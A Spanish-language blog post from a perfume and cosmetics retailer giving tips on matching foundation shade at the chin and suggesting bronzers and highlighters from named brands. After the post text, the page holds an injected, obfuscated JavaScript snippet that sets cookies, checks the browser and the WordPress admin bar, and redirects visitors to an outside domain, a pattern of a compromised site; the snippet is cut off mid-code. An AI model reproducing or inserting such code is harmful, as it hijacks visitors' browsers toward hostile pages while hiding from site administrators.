Si tienes problemas para identificar el tono de tu fondo de maquillaje, hoy en el blog de Perfumerías Tin Tin queremos compartir contigo un truco que te ayudará a que elijas el adecuado para tu piel. ¿Te interesa?

Teint-Idole-Ultra-Wear1

Como te comentábamos en post anteriores, el nuevo Teint Idole Ultra Wear de Lancôme ahora está disponible en 40 tonos para adaptarse a todas las pieles (Una paleta de 15 tonos + tonos complementarios). Si empezamos por ahí, sabes que vas a encontrar el indicado para ti.

Pero, ¿cómo saber cuál es el tuyo entre tantas tonalidades? El consejo de Lisa Eldridge para Lancôme es un truco que toda mujer debe conocer. ¡La clave está en el mentón! Si aplicas el fondo de maquillaje en el mentón y lo difuminas hacia el cuello podrás comprobar si ese color se funde bien con tu tono de piel y si el resultado es uniforme.

Debes buscar el tono que más se asemeje a tu cuello para evitar molestas marcas de corte y diferencia de color.

Ahora que tienes lo principal, ¡llega la hora de la diversión! Juega con toques de luz y polvos de sol para esculpir tu rostro. En cuanto a luminosidad, ya te hemos dado algunos consejos para sacar el máximo provecho al icónico Touche Eclat de Yves Saint Laurent.

Para conseguir un rostro besado por el sol tenemos unos cuantos polvos bronceadores favoritos: empezando por la Edición Limitada de los Terracotta de Guerlain que puedes elegir en acabado ultra mate o ultra brillante.

17362345_646067732251459_9062120870920235174_n

Y sin olvidarnos de Phyto-Touche Poudre Éclat Soleil de Sisley, con los que puedes conseguir un bronceado a medida ya que se adhiere con mucha facilidad y a la perfección al fondo de maquillaje y consigues un acabado natural y de larga duración.

phyto_touche_pl2-kopia

¿Cuál es tu consejo para elegir el tono de maquillaje perfecto? ¡Estamos deseando que nos lo cuentes! Descubre todas las marcas de maquillaje con las que trabajamos en Perfumerías Tin Tin al mejor precio www.perfumestintin.com

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone